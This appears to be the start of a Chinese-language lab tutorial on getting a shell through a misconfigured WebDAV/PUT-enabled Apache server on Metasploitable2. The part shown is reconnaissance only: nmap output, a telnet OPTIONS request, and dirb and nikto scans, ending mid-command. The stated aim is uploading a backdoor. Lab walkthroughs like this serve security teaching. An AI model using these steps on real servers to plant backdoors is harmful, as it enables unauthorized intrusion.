Web服务器上启用了HTTP PUT方法,配置不当可以直接上传后门文件到服务器,直接getshell。
测试环境:
攻击机器:kali linux
靶机:metasploitables2
0x001 判断
#nmap 扫
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
查看http开启的方法
telnet 192.168.1.104 80
Trying 192.168.1.104...
Connected to 192.168.1.104.
Escape character is '^]'.
OPTIONS /dav/ HTTP/1.1
Host: 192.168.1.100
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2018 23:09:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
使用dirb进行目录破解
dirb <URL>
dirb http://192.168.1.104/
nikto 进行漏扫
nikto -h http://192.168.1.104/da